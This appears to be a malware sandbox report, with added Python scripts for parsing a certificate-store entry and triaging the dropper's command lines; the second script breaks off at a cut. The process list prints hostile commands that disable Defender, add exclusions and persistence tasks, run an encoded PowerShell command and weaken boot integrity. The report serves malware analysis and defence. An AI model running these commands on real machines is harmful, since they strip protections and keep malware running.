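CERT_SHA1_HASH_PROP_ID, CERT_FRIENDLY_NAME_PROP_ID, CERT_CERT_PROP_ID = 0x03, 0x0B, 0x20


def parse_blob(blob: bytes) -> dict:
    """Return {propid: data} in on-disk order; ValueError on a truncated or malformed blob."""
    props, off = {}, 0
    while off < len(blob):
        if off + 12 > len(blob):
            raise ValueError(f"truncated property header at offset {off}")
        propid, reserved, length = struct.unpack_from("<III", blob, off)
        if reserved != 1:
            raise ValueError(f"unexpected reserved field {reserved:#x} at offset {off}")
        off += 12
        if off + length > len(blob):
            raise ValueError(f"property {propid:#x} runs past the end of the blob")
        props[propid] = blob[off:off + length]
        off += length
    return props


def is_well_formed(blob: bytes) -> bool:
    try:
        parse_blob(blob)
        return True
    except ValueError:
        return False


def describe(reg_key_name: str, blob: bytes) -> dict:
    """Cross-check a store entry: the key name, the cached SHA1 property and the real
    SHA-1 of the DER certificate must all agree, or the entry was not written by CryptoAPI."""
    props = parse_blob(blob)
    der = props[CERT_CERT_PROP_ID]
    actual = hashlib.sha1(der).hexdigest()
    cached = props.get(CERT_SHA1_HASH_PROP_ID, b"").hex()
    name = props.get(CERT_FRIENDLY_NAME_PROP_ID, b"").decode("utf-16-le").rstrip("\0")
    return {
        "friendly_name": name,
        "sha1": actual,
        "sha256": hashlib.sha256(der).hexdigest(),  # what crt.sh / CCADB index on
        "consistent": actual == cached == reg_key_name.lower(),
        "properties": [PROP_NAMES.get(p, f"{p:#x}") for p in props],
    }


def build_blob(records) -> bytes:
    """Inverse of parse_blob; used here only to construct the samples below."""
    return b"".join(struct.pack("<III", pid, 1, len(data)) + data for pid, data in records)


# Constructed samples, not the page's blobs: a stand-in DER body with the property
# layout of the DAC9... entry (SHA1, friendly name, certificate).
STANDIN_DER = bytes.fromhex("3003020100")  # SEQUENCE { INTEGER 0 }
GOOD_SHA1 = hashlib.sha1(STANDIN_DER).hexdigest()
GOOD_BLOB = build_blob([
    (CERT_SHA1_HASH_PROP_ID, bytes.fromhex(GOOD_SHA1)),
    (CERT_FRIENDLY_NAME_PROP_ID, "DST Root CA X3\0".encode("utf-16-le")),
    (CERT_CERT_PROP_ID, STANDIN_DER),
])
# Same key name and cached hash, different certificate body: the inconsistency a
# hand-built or hex-edited store entry leaves behind.
TAMPERED_BLOB = build_blob([
    (CERT_SHA1_HASH_PROP_ID, bytes.fromhex(GOOD_SHA1)),
    (CERT_FRIENDLY_NAME_PROP_ID, "DST Root CA X3\0".encode("utf-16-le")),
    (CERT_CERT_PROP_ID, bytes.fromhex("3003020101")),
])

if __name__ == "__main__":
    for label, blob in (("good", GOOD_BLOB), ("tampered", TAMPERED_BLOB)):
        print(label, describe(GOOD_SHA1.upper(), blob))
```

To run it against this report, paste the hex after `Blob =` into `bytes.fromhex()` and pass the thumbprint from the key path as `reg_key_name`; the `sha256` field is the value to look up in crt.sh or the CCADB root inventory, which settles whether the certificate is a public root or something the dropper brought with it.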
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Documents\GuardFox\bQOLs_KzAajPMcBahu3Ki1Xn.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\Documents\GuardFox\zeU9vv9nuzG3RNfSlJKkwkOp.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\Documents\GuardFox\zeU9vv9nuzG3RNfSlJKkwkOp.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
C:\Users\Admin\Documents\GuardFox\bQOLs_KzAajPMcBahu3Ki1Xn.exe
"C:\Users\Admin\Documents\GuardFox\bQOLs_KzAajPMcBahu3Ki1Xn.exe"
C:\Users\Admin\Documents\GuardFox\8eOHeex_k9wfHwMD7SGMgz9Y.exe
"C:\Users\Admin\Documents\GuardFox\8eOHeex_k9wfHwMD7SGMgz9Y.exe"
C:\Users\Admin\Documents\GuardFox\NyFfxttsDs7yttnSmMFWaHvk.exe
"C:\Users\Admin\Documents\GuardFox\NyFfxttsDs7yttnSmMFWaHvk.exe"
C:\Users\Admin\AppData\Local\Temp\is-JE7UB.tmp\NyFfxttsDs7yttnSmMFWaHvk.tmp
"C:\Users\Admin\AppData\Local\Temp\is-JE7UB.tmp\NyFfxttsDs7yttnSmMFWaHvk.tmp" /SL5="$60136,4078676,54272,C:\Users\Admin\Documents\GuardFox\NyFfxttsDs7yttnSmMFWaHvk.exe"
C:\Users\Admin\AppData\Local\Temp\7zS60D5.tmp\Install.exe
.\Install.exe
C:\Users\Admin\Documents\GuardFox\ld8Q44Ookby2IoAmF2mmqlTH.exe
"C:\Users\Admin\Documents\GuardFox\ld8Q44Ookby2IoAmF2mmqlTH.exe"
C:\Users\Admin\AppData\Local\Temp\7zS6B31.tmp\Install.exe
.\Install.exe /cdidqlUao "525403" /S
C:\Users\Admin\Documents\GuardFox\ed9bgwrip2NapKmOQF2l_5ag.exe
"C:\Users\Admin\Documents\GuardFox\ed9bgwrip2NapKmOQF2l_5ag.exe"
C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe
"C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe"
C:\Users\Admin\Documents\GuardFox\zeU9vv9nuzG3RNfSlJKkwkOp.exe
"C:\Users\Admin\Documents\GuardFox\zeU9vv9nuzG3RNfSlJKkwkOp.exe"
C:\Users\Admin\Documents\GuardFox\aWc11fRNx6nQw6sDez3g1qv4.exe
"C:\Users\Admin\Documents\GuardFox\aWc11fRNx6nQw6sDez3g1qv4.exe"
C:\Users\Admin\Documents\GuardFox\ZGhfF8uvNlyBvpurdLETtmk_.exe
"C:\Users\Admin\Documents\GuardFox\ZGhfF8uvNlyBvpurdLETtmk_.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Get-WmiObject -Namespace root\SecurityCenter2 -Class AntiVirusProduct
C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240223090023.log C:\Windows\Logs\CBS\CbsPersist_20240223090023.cab
C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe
"C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef5539758,0x7fef5539768,0x7fef5539778
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gBVIaQAaO" /SC once /ST 06:57:15 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gBVIaQAaO"
C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe
C:\Windows\system32\taskeng.exe
taskeng.exe {189EDEEA-DF8B-4309-AFAA-22A85260AC03} S-1-5-21-2721934792-624042501-2768869379-1000:BISMIZHX\Admin:Interactive:[1]
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
C:\Windows\system32\schtasks.exe
schtasks /delete /tn ScheduledUpdate /f
C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1160 --field-trial-handle=1448,i,4869214669569361197,983088060033817693,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1424 --field-trial-handle=1448,i,4869214669569361197,983088060033817693,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1596 --field-trial-handle=1448,i,4869214669569361197,983088060033817693,131072 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2304 --field-trial-handle=1448,i,4869214669569361197,983088060033817693,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2232 --field-trial-handle=1448,i,4869214669569361197,983088060033817693,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3348 --field-trial-handle=1448,i,4869214669569361197,983088060033817693,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3084 --field-trial-handle=1448,i,4869214669569361197,983088060033817693,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1468 --field-trial-handle=1448,i,4869214669569361197,983088060033817693,131072 /prefetch:2
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gBVIaQAaO"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1905151612-1294555895568799192-348904360755802282-12423083741589601242-74749301"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "beMXFFiCiqlBKkvOrW" /SC once /ST 09:02:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\MJtmiEaOySOnsMbTj\ProJgWWzBHWXbAm\XOmGTSn.exe\" Fm /fBsite_idZpU 525403 /S" /V1 /F
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 708 -s 580
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4148 --field-trial-handle=1448,i,4869214669569361197,983088060033817693,131072 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\heidi_K9P2oRtBlnq\KNhryoa8p5U1x6qRHgW5.exe
"C:\Users\Admin\AppData\Local\Temp\heidi_K9P2oRtBlnq\KNhryoa8p5U1x6qRHgW5.exe"
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" https://www.youtube.com/
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" https://www.linkedin.com/login
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" https://www.facebook.com/video
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" https://accounts.google.com/
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2464 CREDAT:275457 /prefetch:2
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2004 CREDAT:275457 /prefetch:2
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:936 CREDAT:275457 /prefetch:2
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1396 CREDAT:275457 /prefetch:2
C:\Users\Admin\AppData\Local\Temp\2BF.exe
C:\Users\Admin\AppData\Local\Temp\2BF.exe
C:\Users\Admin\AppData\Local\Temp\2BF.exe
C:\Users\Admin\AppData\Local\Temp\2BF.exe
C:\Windows\system32\regsvr32.exe
regsvr32 /s C:\Users\Admin\AppData\Local\Temp\1028.dll
C:\Windows\SysWOW64\regsvr32.exe
/s C:\Users\Admin\AppData\Local\Temp\1028.dll
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe" /tn "MSIUpdaterV131 HR" /sc HOURLY /rl HIGHEST
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -timeout 0
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
C:\Windows\system32\bcdedit.exe
C:\Windows\Sysnative\bcdedit.exe /v
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe" /tn "MSIUpdaterV131 LG" /sc ONLOGON /rl HIGHEST
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
C:\Users\Admin\AppData\Local\Temp\heidi_K9P2oRtBlnq\svXurge7NCIUBVHrYG75.exe
"C:\Users\Admin\AppData\Local\Temp\heidi_K9P2oRtBlnq\svXurge7NCIUBVHrYG75.exe"
C:\Users\Admin\AppData\Local\Temp\6C6B.exe
C:\Users\Admin\AppData\Local\Temp\6C6B.exe
C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Users\Admin\AppData\Local\Temp\84BD.exe
C:\Users\Admin\AppData\Local\Temp\84BD.exe
C:\Users\Admin\AppData\Local\Temp\A6CE.exe
C:\Users\Admin\AppData\Local\Temp\A6CE.exe
C:\Users\Admin\AppData\Local\Temp\heidi_K9P2oRtBlnq\caYoou6AkD688ohBorlb.exe
"C:\Users\Admin\AppData\Local\Temp\heidi_K9P2oRtBlnq\caYoou6AkD688ohBorlb.exe"
C:\Windows\windefender.exe
"C:\Windows\windefender.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4076 -s 128
C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe
"C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"
C:\Windows\SysWOW64\cmd.exe
cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\SysWOW64\sc.exe
sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\windefender.exe
C:\Windows\windefender.exe
C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe
"C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe"
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
C:\Users\Admin\AppData\Local\Temp\CF74.exe
C:\Users\Admin\AppData\Local\Temp\CF74.exe
C:\Users\Admin\AppData\Local\Temp\FourthX.exe
"C:\Users\Admin\AppData\Local\Temp\FourthX.exe"
C:\Users\Admin\AppData\Local\Temp\nsuDA1C.tmp
C:\Users\Admin\AppData\Local\Temp\nsuDA1C.tmp
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "
C:\Windows\SysWOW64\chcp.com
chcp 1251
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
C:\Users\Admin\AppData\Local\Temp\EF74.exe
C:\Users\Admin\AppData\Local\Temp\EF74.exe
C:\Users\Admin\AppData\Local\Temp\is-R37QN.tmp\EF74.tmp
"C:\Users\Admin\AppData\Local\Temp\is-R37QN.tmp\EF74.tmp" /SL5="$303CE,4061719,54272,C:\Users\Admin\AppData\Local\Temp\EF74.exe"
C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe
"C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"
C:\Windows\system32\taskeng.exe
taskeng.exe {8903C1B5-A8FA-445B-8D40-1E14AB9CCD71} S-1-5-18:NT AUTHORITY\System:Service:
C:\Users\Admin\AppData\Local\Temp\8.exe
C:\Users\Admin\AppData\Local\Temp\8.exe
C:\Users\Admin\AppData\Local\Temp\is-MIBAB.tmp\8.tmp
"C:\Users\Admin\AppData\Local\Temp\is-MIBAB.tmp\8.tmp" /SL5="$303CA,4314505,54272,C:\Users\Admin\AppData\Local\Temp\8.exe"
C:\Users\Admin\AppData\Local\Temp\305.exe
C:\Users\Admin\AppData\Local\Temp\305.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Users\Admin\AppData\Local\Temp\MJtmiEaOySOnsMbTj\ProJgWWzBHWXbAm\XOmGTSn.exe
C:\Users\Admin\AppData\Local\Temp\MJtmiEaOySOnsMbTj\ProJgWWzBHWXbAm\XOmGTSn.exe Fm /fBsite_idZpU 525403 /S
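The command lines above carry most of the defense-evasion and persistence chain in a form that is awkward to read in a raw process list. The Python triage script below is an added example, not part of this report: it tags each command line with the technique it implements and enriches two of them. It base64/UTF-16LE-decodes the `-EncodedCommand` payload of the gBVIaQAaO task, which comes out as `start-process -WindowStyle Hidden gpupdate.exe /force` (the step that makes the Windows Defender policy values written by the preceding REG ADD calls take effect), and it parses the SDDL handed to `sc sdset WinDefender`, whose `(D;;WPDT;;;BA)` ACE denies Administrators SERVICE_STOP and SERVICE_PAUSE_CONTINUE on the service that runs C:\Windows\windefender.exe (a name chosen to resemble Microsoft Defender; it is not). The rule names, the `triage()` API and the sample list are mine; the sample lines themselves are copied from the process list.

```python
"""Triage of the command lines in the process list above (added example, not part of
the sandbox report): decode the PowerShell -EncodedCommand payload, parse the SDDL
passed to `sc sdset WinDefender`, and tag each line with the technique it implements."""
import base64
import re

# Two-letter SDDL access-right codes as they apply to service objects.
SERVICE_RIGHTS = {
    "CC": "SERVICE_QUERY_CONFIG", "DC": "SERVICE_CHANGE_CONFIG", "LC": "SERVICE_QUERY_STATUS",
    "SW": "SERVICE_ENUMERATE_DEPENDENTS", "RP": "SERVICE_START", "WP": "SERVICE_STOP",
    "DT": "SERVICE_PAUSE_CONTINUE", "LO": "SERVICE_INTERROGATE",
    "CR": "SERVICE_USER_DEFINED_CONTROL", "SD": "DELETE", "RC": "READ_CONTROL",
    "WD": "WRITE_DAC", "WO": "WRITE_OWNER",
}
# Well-known SID abbreviations that occur in the report's descriptor.
TRUSTEES = {"SY": "LocalSystem", "BA": "Administrators", "IU": "Interactive",
            "SU": "Service", "WD": "Everyone"}
# One ACE: (type;flags;rights;object_guid;inherit_object_guid;sid)
ACE_RE = re.compile(r"\(([^;]*);([^;]*);([^;]*);([^;]*);([^;]*);([^)]*)\)")
WINDEFENDER_SDDL = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)"
                    "(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)")


def decode_encoded_command(blob: str) -> str:
    """-EncodedCommand is base64 over UTF-16LE, not UTF-8."""
    return base64.b64decode(blob).decode("utf-16-le")


def parse_sddl(sddl: str) -> dict:
    """{'dacl': [(type, rights_codes, sid)], 'sacl': [...]} for the D:/S: sections;
    an O:/G: owner/group prefix, if present, is skipped."""
    dacl_src, _, sacl_src = sddl.partition("S:")
    dacl_src = dacl_src.partition("D:")[2]
    out = {"dacl": [], "sacl": []}
    for name, src in (("dacl", dacl_src), ("sacl", sacl_src)):
        for ace_type, _flags, rights, _obj, _iobj, sid in ACE_RE.findall(src):
            codes = tuple(rights[i:i + 2] for i in range(0, len(rights), 2))  # fixed 2-char codes
            out[name].append((ace_type, codes, sid))
    return out


def denied_service_rights(sddl: str) -> dict:
    """{trustee: [right names]} for every deny ACE in the DACL."""
    return {TRUSTEES.get(sid, sid): [SERVICE_RIGHTS.get(c, c) for c in codes]
            for ace_type, codes, sid in parse_sddl(sddl)["dacl"] if ace_type == "D"}


# (tag, regex over the raw command line); matched case-insensitively.
RULES = [
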